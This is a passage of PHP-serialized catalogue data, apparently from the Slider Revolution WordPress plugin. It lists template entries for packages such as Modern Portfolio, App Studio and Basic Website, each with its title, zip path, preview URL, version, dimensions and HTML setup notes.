About\";s:5:\"alias\";s:15:\"portfolio-about\";s:3:\"zip\";s:25:\"packs/portfolio-about.zip\";s:3:\"uid\";s:32:\"5d3a4724fd453de5313ceb6696c1db62\";s:3:\"img\";s:26:\"portfolio-about/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/modern-portfolio-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:145:\"<span class=\"ttm_content\">A modern portfolio template with fancy scroll animations and a colorful design.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"Modern Portfolio\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"23\";s:9:\"installed\";b:0;}i:306;a:25:{s:2:\"id\";s:3:\"322\";s:5:\"title\";s:21:\"Portfolio Works Title\";s:5:\"alias\";s:21:\"portfolio-works-title\";s:3:\"zip\";s:31:\"packs/portfolio-works-title.zip\";s:3:\"uid\";s:32:\"cbb5c6e875cc1f25b463fdf89cabef28\";s:3:\"img\";s:32:\"portfolio-works-title/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/modern-portfolio-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:145:\"<span class=\"ttm_content\">A modern portfolio template with fancy scroll animations and a colorful design.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"Modern Portfolio\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"23\";s:9:\"installed\";b:0;}i:307;a:25:{s:2:\"id\";s:3:\"323\";s:5:\"title\";s:23:\"Portfolio Works Content\";s:5:\"alias\";s:23:\"portfolio-works-content\";s:3:\"zip\";s:33:\"packs/portfolio-works-content.zip\";s:3:\"uid\";s:32:\"5c87311128c7794ffa6ee07ea0648082\";s:3:\"img\";s:34:\"portfolio-works-content/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/modern-portfolio-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:145:\"<span class=\"ttm_content\">A modern portfolio template with fancy scroll animations and a colorful design.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"Modern Portfolio\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"23\";s:9:\"installed\";b:0;}i:308;a:25:{s:2:\"id\";s:3:\"324\";s:5:\"title\";s:18:\"Portfolio Contacts\";s:5:\"alias\";s:18:\"portfolio-contacts\";s:3:\"zip\";s:28:\"packs/portfolio-contacts.zip\";s:3:\"uid\";s:32:\"bd81feffad83b69218f7e837478038e5\";s:3:\"img\";s:29:\"portfolio-contacts/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/modern-portfolio-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:145:\"<span class=\"ttm_content\">A modern portfolio template with fancy scroll animations and a colorful design.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"Modern Portfolio\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"23\";s:9:\"installed\";b:0;}i:309;a:25:{s:2:\"id\";s:3:\"325\";s:5:\"title\";s:18:\"App Studio Website\";s:5:\"alias\";s:18:\"app-studio-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:26:\"app-studio-website-package\";s:3:\"img\";s:31:\"packages/App_Studio_package.jpg\";s:7:\"preview\";s:53:\"https://revolution.themepunch.com/app-studio-website/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:149:\"<span class=\"ttm_content\">A modern one-page presentation website to present your mobile app development team.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:10:\"App Studio\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"24\";s:9:\"installed\";b:0;}i:310;a:25:{s:2:\"id\";s:3:\"326\";s:5:\"title\";s:18:\"App Studio Welcome\";s:5:\"alias\";s:18:\"App-Studio-Welcome\";s:3:\"zip\";s:28:\"packs/App-Studio-Welcome.zip\";s:3:\"uid\";s:32:\"2ce0f3c54214b04e6c3a9becfd59730c\";s:3:\"img\";s:29:\"App-Studio-Welcome/slide1.jpg\";s:7:\"preview\";s:53:\"https://revolution.themepunch.com/app-studio-website/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:149:\"<span class=\"ttm_content\">A modern one-page presentation website to present your mobile app development team.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:10:\"App Studio\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"24\";s:9:\"installed\";b:0;}i:311;a:25:{s:2:\"id\";s:3:\"327\";s:5:\"title\";s:19:\"App Studio Services\";s:5:\"alias\";s:19:\"App-Studio-Services\";s:3:\"zip\";s:29:\"packs/App-Studio-Services.zip\";s:3:\"uid\";s:32:\"5df7776271ec69d2f9edaa6b842715a9\";s:3:\"img\";s:30:\"App-Studio-Services/slide1.jpg\";s:7:\"preview\";s:53:\"https://revolution.themepunch.com/app-studio-website/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:149:\"<span class=\"ttm_content\">A modern one-page presentation website to present your mobile app development team.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:10:\"App Studio\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"24\";s:9:\"installed\";b:0;}i:312;a:25:{s:2:\"id\";s:3:\"328\";s:5:\"title\";s:16:\"App Studio About\";s:5:\"alias\";s:16:\"App-Studio-About\";s:3:\"zip\";s:26:\"packs/App-Studio-About.zip\";s:3:\"uid\";s:32:\"af8b84dc116c629df7bd89fc69271a2e\";s:3:\"img\";s:27:\"App-Studio-About/slide1.jpg\";s:7:\"preview\";s:53:\"https://revolution.themepunch.com/app-studio-website/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:149:\"<span class=\"ttm_content\">A modern one-page presentation website to present your mobile app development team.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:10:\"App Studio\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"24\";s:9:\"installed\";b:0;}i:313;a:25:{s:2:\"id\";s:3:\"329\";s:5:\"title\";s:19:\"App Studio Contacts\";s:5:\"alias\";s:19:\"App-Studio-Contacts\";s:3:\"zip\";s:29:\"packs/App-Studio-Contacts.zip\";s:3:\"uid\";s:32:\"afbbd2214c983d314f3215a00db9198d\";s:3:\"img\";s:30:\"App-Studio-Contacts/slide1.jpg\";s:7:\"preview\";s:53:\"https://revolution.themepunch.com/app-studio-website/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:149:\"<span class=\"ttm_content\">A modern one-page presentation website to present your mobile app development team.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:10:\"App Studio\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"24\";s:9:\"installed\";b:0;}i:314;a:22:{s:2:\"id\";s:3:\"330\";s:5:\"title\";s:14:\"Cube Animation\";s:5:\"alias\";s:14:\"cube-animation\";s:3:\"zip\";s:18:\"cube-animation.zip\";s:3:\"uid\";s:32:\"c03dd3cfc60479dfc6d79ddb64fa0ec5\";s:3:\"img\";s:25:\"cube-animation/slide1.jpg\";s:7:\"preview\";s:65:\"https://revolution.themepunch.com/cube-animation-slider-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:155:\"<span class=\"ttm_content\">A modern slider with text elements, cube animations and a striking call to action button.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:315;a:25:{s:2:\"id\";s:3:\"331\";s:5:\"title\";s:13:\"Basic Website\";s:5:\"alias\";s:13:\"basic-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:21:\"basic-website-package\";s:3:\"img\";s:26:\"packages/basic_package.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/basic-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Basic Website\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"25\";s:9:\"installed\";b:0;}i:316;a:25:{s:2:\"id\";s:3:\"332\";s:5:\"title\";s:10:\"Basic Menu\";s:5:\"alias\";s:10:\"basic-menu\";s:3:\"zip\";s:20:\"packs/basic-menu.zip\";s:3:\"uid\";s:32:\"39277f53b2cb5ac644a1649b47c37270\";s:3:\"img\";s:21:\"basic-menu/slide1.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/basic-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Basic Website\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"25\";s:9:\"installed\";b:0;}i:317;a:25:{s:2:\"id\";s:3:\"333\";s:5:\"title\";s:12:\"Basic Header\";s:5:\"alias\";s:12:\"basic-header\";s:3:\"zip\";s:22:\"packs/basic-header.zip\";s:3:\"uid\";s:32:\"ad7a32dbccb0bdf9de64cf2adfa950a2\";s:3:\"img\";s:23:\"basic-header/slide1.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/basic-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Basic Website\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"25\";s:9:\"installed\";b:0;}i:318;a:25:{s:2:\"id\";s:3:\"334\";s:5:\"title\";s:13:\"Basic Content\";s:5:\"alias\";s:13:\"basic-content\";s:3:\"zip\";s:23:\"packs/basic-content.zip\";s:3:\"uid\";s:32:\"0b12f3b183a3c8206e3a7b28d2d93108\";s:3:\"img\";s:24:\"basic-content/slide1.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/basic-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Basic Website\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"25\";s:9:\"installed\";b:0;}i:319;a:25:{s:2:\"id\";s:3:\"335\";s:5:\"title\";s:14:\"Basic Carousel\";s:5:\"alias\";s:14:\"basic-carousel\";s:3:\"zip\";s:24:\"packs/basic-carousel.zip\";s:3:\"uid\";s:32:\"e4abb5c6d5cf914530575a982d3dfc14\";s:3:\"img\";s:25:\"basic-carousel/slide1.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/basic-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:8:\"carousel\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Basic Website\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"25\";s:9:\"installed\";b:0;}i:320;a:25:{s:2:\"id\";s:3:\"336\";s:5:\"title\";s:13:\"Basic Callout\";s:5:\"alias\";s:13:\"basic-callout\";s:3:\"zip\";s:23:\"packs/basic-callout.zip\";s:3:\"uid\";s:32:\"2ccc208b9322f5435d0f4ff64c6d9dab\";s:3:\"img\";s:24:\"basic-callout/slide1.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/basic-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Basic Website\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"25\";s:9:\"installed\";b:0;}i:321;a:25:{s:2:\"id\";s:3:\"337\";s:5:\"title\";s:10:\"Basic Grid\";s:5:\"alias\";s:10:\"basic-grid\";s:3:\"zip\";s:20:\"packs/basic-grid.zip\";s:3:\"uid\";s:32:\"3cb4b41d2992eba012921b8fb7c96daa\";s:3:\"img\";s:21:\"basic-grid/slide1.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/basic-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Basic Website\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"25\";s:9:\"installed\";b:0;}i:322;a:25:{s:2:\"id\";s:3:\"338\";s:5:\"title\";s:17:\"Basic Video Block\";s:5:\"alias\";s:17:\"basic-video-block\";s:3:\"zip\";s:27:\"packs/basic-video-block.zip\";s:3:\"uid\";s:32:\"e7c1d42b21819741f3e72c1325dae5ed\";s:3:\"img\";s:28:\"basic-video-block/slide1.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/basic-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Basic Website\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"25\";s:9:\"installed\";b:0;}i:323;a:25:{s:2:\"id\";s:3:\"339\";s:5:\"title\";s:12:\"Basic Footer\";s:5:\"alias\";s:12:\"basic-footer\";s:3:\"zip\";s:22:\"packs/basic-footer.zip\";s:3:\"uid\";s:32:\"ed8f6a554775ebace558af2f4f2dcbac\";s:3:\"img\";s:23:\"basic-footer/slide1.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/basic-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly 